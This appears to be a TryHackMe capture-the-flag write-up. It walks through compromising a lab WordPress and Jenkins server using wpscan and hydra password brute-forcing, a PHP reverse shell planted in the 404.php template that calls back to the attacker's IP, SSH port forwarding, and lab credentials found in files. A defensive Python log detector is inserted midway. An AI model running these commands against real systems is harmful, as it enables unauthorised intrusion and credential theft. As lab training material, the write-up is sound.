TryHackMe – How I Used WPScan to Extract Login Credentials (WordPress)


BACKGROUND

This CTF challenge is another black-box-style pentest where we don’t know anything about our target other than its IP address.

We will have to discover the ports and services running on the server with standard pentesting tools like nmap and dirb. We also don’t have any inside information about the backend of the target machine.

Let’s get started!

We’ll be testing out the website pentest.ws during today’s video walkthrough.

It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports).

At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.

ENUMERATION/RECON

sudo nmap -A -oX nmap.txt $targetIP -p-

Today we are exporting our nmap results in XML format so that we can upload them to pentest.ws and have the site automatically parse our findings.

dirb http://$targetIP -o dirb.txt

We discovered a WordPress login at: http://internal.thm/blog/wp-login.php

USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS

Let’s use wpscan to discover the admin’s email and password for WordPress.

wpscan --url 10.10.61.252/blog -e vp,u -o wpscan.txt

Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.

wpscan --url 10.10.61.252/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt

We found the admin email and password!

admin:my2boys

Now we can log into WordPress and look for a place to upload a revshell.

INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP

We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.

If you want to learn more about ezpzshell, check out my previous blog post:

👉 Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation

ezpz 10.6.2.23 8888 php

(ezpzshell also automatically starts a listener.)

After copying the payload to 404.php, we make sure it is saved and then trigger the payload:

http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php

And if everything is set up correctly, we will catch the revshell with ezpz as user: www-data.

STABILIZE THE SHELL

The following command will stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

INTERNAL ENUMERATION – FIND USER CREDS

We discover a txt file with credentials:

cat wp-save.txt 
Bill,
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Let’s try switching users to aubreanna with the password given in wp-save.txt.

su aubreanna

We are in as user aubreanna and immediately find the user flag.

aubreanna@internal:~$ cat user.txt
THM{i—------omitted--------1}

MORE ENUMERATION – DISCOVER A JENKINS SERVICE

cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

SET UP PORT FORWARDING VIA SSH LOGIN

ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252

SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the Jenkins login page in our browser.

BRUTE-FORCE THE LOGIN

hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'

The payload on this command has three parts:

  1. http-post-form + header
  2. the request, edited with admin as the username and ^PASS^ in place of the password to mark it as the variable for the password wordlist
  3. the error message that the website will return with a wrong password 

Using Burp Suite or the developer tools in Firefox will allow us to extract these strings and modify them into our final hydra payload.

Output:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10

Credentials found! admin:spongebob
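From the server side, the wpscan user enumeration and password brute-force earlier, the direct request to the 404.php template, and the hydra run against the Jenkins login handler all leave a recognisable trail in the web access logs. As an added defender-side example (not part of the original walkthrough), the Python below runs a few signature checks and a per-IP POST-rate check over constructed Apache-style log lines; the client IPs, timestamps, the 20-requests-per-60-seconds threshold and the log format are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# Paths wpscan's user enumeration touches, plus a direct hit on a theme template (normally only included server-side).
SIGNATURES = [
    (re.compile(r"/wp-json/wp/v2/users"), "WP REST user listing"),
    (re.compile(r"[?&]author=\d+"), "WP author-ID probe"),
    (re.compile(r"/wp-content/themes/[^/]+/\w+\.php$"), "direct theme template request"),
]
# Login handlers hit by the two brute-force phases (WordPress, then Jenkins through the SSH tunnel).
LOGIN_POSTS = ("/blog/wp-login.php", "/j_acegi_security_check")

def detect(lines, threshold=20, window=timedelta(seconds=60)):
    """Scan access log lines (in time order); return one alert string per finding."""
    alerts, recent = [], defaultdict(deque)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m["ip"], m["method"], m["path"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        for pattern, label in SIGNATURES:
            if pattern.search(path):
                alerts.append(f"{ip} {label}: {path}")
        endpoint = path.split("?")[0]
        if method == "POST" and endpoint in LOGIN_POSTS:
            q = recent[(ip, endpoint)]
            q.append(ts)
            while ts - q[0] > window:      # drop POSTs older than the window
                q.popleft()
            if len(q) == threshold:         # fire once, when the rate first crosses the threshold
                alerts.append(f"{ip} login brute-force on {endpoint}: {threshold} POSTs in {window.seconds}s")
    return alerts

def _line(ip, sec, method, path, status):
    return f'{ip} - - [06/Feb/2023:08:57:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 512'

# Constructed sample log: enumeration, the 404.php trigger, one legitimate login, then a POST flood.
SAMPLE_LOG = [
    _line("10.6.2.23", 1, "GET", "/blog/?author=1", 301),
    _line("10.6.2.23", 2, "GET", "/blog/wp-json/wp/v2/users", 200),
    _line("10.0.0.5", 5, "POST", "/blog/wp-login.php", 302),
    _line("10.6.2.23", 8, "GET", "/wordpress/wp-content/themes/twentyseventeen/404.php", 200),
] + [_line("10.6.2.23", 10 + i, "POST", "/j_acegi_security_check", 302) for i in range(25)]

if __name__ == "__main__":
    print("\n".join(detect(SAMPLE_LOG)))
```

The rate check assumes the lines arrive in timestamp order, as they do in a live access log; sort them first when replaying merged logs.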

ENUMERATING JENKINS AS ADMIN

We’ll use the script console on Jenkins to spawn another revshell using the Groovy scripting language.

We’ll use ezpzshell and choose the Java code, because Groovy is built on Java. This time when we catch it, we will be user jenkins.

Manually enumerating through the file system we stumble across a note.txt. Let’s check out the contents:

cat note.txt

Output:

Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you need access to the root user account.

root:tr0ub13guM!@#123

Bingo! We found root user credentials! 

SWITCH USERS TO ROOT

su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}

FINAL THOUGHTS

I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.

I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.

However, I have concerns about the security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords.

Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.

👉 Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation